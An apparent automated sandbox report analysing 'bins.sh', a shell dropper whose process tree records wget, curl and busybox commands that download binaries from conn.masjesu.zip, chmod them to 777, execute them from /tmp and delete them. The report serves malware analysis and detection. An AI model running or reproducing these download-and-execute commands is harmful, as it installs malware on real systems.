Analysis
-
max time kernel
69s -
max time network
70s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
16/12/2024, 04:16
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
debian12-armhf-20240221-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian12-mipsel-20240221-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
Behavioral task
behavioral6
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral7
Sample
bins.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
7c06e835a83b81914ba9a19c15e66d76
-
SHA1
bc618204890c0b179a00d6d253001a6e27197aa1
-
SHA256
cf982818df24e8535c11ddeee9410d1545a54203538acf160c505dcb7ad1cbeb
-
SHA512
4bbe783a5be8061d432c7a90b941059b63a1adc687741621537fbde9f2631c045bccb8ef3d0fcbb9aac75dd15f9ab949678fd3c6b879b3e4ba7d74b585e5f9d2
-
SSDEEP
192:IWWlW1WGWfWLWqVl9MT3rtdp2n3Viuz3WdNdGmX4spz3WdN8X4mWlW1WGWfWLWVh:jAtdp2n3Vi9GOMdp2n3Fu
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 897 chmod 974 chmod 988 chmod 1016 chmod 803 chmod 918 chmod 939 chmod 960 chmod 883 chmod 904 chmod 932 chmod 946 chmod 981 chmod 995 chmod 756 chmod 828 chmod 859 chmod 890 chmod 925 chmod 953 chmod 967 chmod 1002 chmod 763 chmod 779 chmod 836 chmod 911 chmod 1009 chmod 748 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA 749 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX 757 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht 764 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO 781 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O 804 lAKMISeUV2PhSu0DN3bVycJibusAQif91O /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj 829 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p 837 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf 861 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE 884 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J 891 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 898 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ 905 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen 912 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ 919 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J 926 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 933 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE 940 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen 947 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ 954 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ 961 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX 968 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht 975 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO 982 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA 989 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj 996 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p 1003 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf 1010 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O 1017 lAKMISeUV2PhSu0DN3bVycJibusAQif91O -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 760 curl 777 busybox 815 curl 887 curl 908 curl 938 busybox 963 wget 736 curl 755 busybox 824 busybox 893 wget 1001 busybox 832 wget 865 wget 870 curl 903 busybox 957 curl 992 curl 894 curl 910 busybox 945 busybox 985 curl 842 wget 929 curl 943 curl 952 busybox 980 busybox 984 wget 753 curl 889 busybox 964 curl 1013 curl 746 busybox 845 curl 896 busybox 950 curl 759 wget 900 wget 915 curl 928 wget 970 wget 998 wget 914 wget 978 curl 1005 wget 1015 busybox 722 wget 769 curl 791 curl 855 busybox 880 busybox 901 curl 917 busybox 977 wget 987 busybox 835 busybox 942 wget 949 wget 959 busybox 991 wget 1006 curl 1012 wget 752 wget 766 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE curl File opened for modification /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen curl File opened for modification /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p curl File opened for modification /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 curl File opened for modification /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ curl File opened for modification /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ curl File opened for modification /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht curl File opened for modification /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p curl File opened for modification /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O curl File opened for modification /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX curl File opened for modification /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj curl File opened for modification /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ curl File opened for modification /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 curl File opened for modification /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj curl File opened for modification /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J curl File opened for modification /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA curl File opened for modification /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf curl File opened for modification /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O curl File opened for modification /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf curl File opened for modification /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE curl File opened for modification /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA curl File opened for modification /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen curl File opened for modification /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO curl File opened for modification /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX curl File opened for modification /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht curl File opened for modification /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ curl File opened for modification /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J curl File opened for modification /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:717
-
/bin/rm/bin/rm bins.sh2⤵PID:720
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:722
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:746
-
-
/bin/chmodchmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵PID:750
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- System Network Configuration Discovery
PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- System Network Configuration Discovery
PID:755
-
-
/bin/chmodchmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- Executes dropped EXE
PID:757
-
-
/bin/rmrm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵PID:758
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- System Network Configuration Discovery
PID:759
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:760
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵PID:762
-
-
/bin/chmodchmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵PID:765
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- System Network Configuration Discovery
PID:766
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- System Network Configuration Discovery
PID:777
-
-
/bin/chmodchmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- Executes dropped EXE
PID:781
-
-
/bin/rmrm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵PID:784
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵PID:785
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵PID:799
-
-
/bin/chmodchmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O./lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- Executes dropped EXE
PID:804
-
-
/bin/rmrm lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵PID:807
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵PID:808
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- System Network Configuration Discovery
PID:824
-
-
/bin/chmodchmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵PID:831
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- System Network Configuration Discovery
PID:832
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- System Network Configuration Discovery
PID:835
-
-
/bin/chmodchmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵PID:841
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- System Network Configuration Discovery
PID:842
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵PID:863
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- System Network Configuration Discovery
PID:865
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- System Network Configuration Discovery
PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- System Network Configuration Discovery
PID:917
-
-
/bin/chmodchmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵PID:924
-
-
/bin/chmodchmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵PID:927
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- System Network Configuration Discovery
PID:928
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵PID:931
-
-
/bin/chmodchmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- System Network Configuration Discovery
PID:938
-
-
/bin/chmodchmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- System Network Configuration Discovery
PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- System Network Configuration Discovery
PID:952
-
-
/bin/chmodchmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵PID:955
-
-
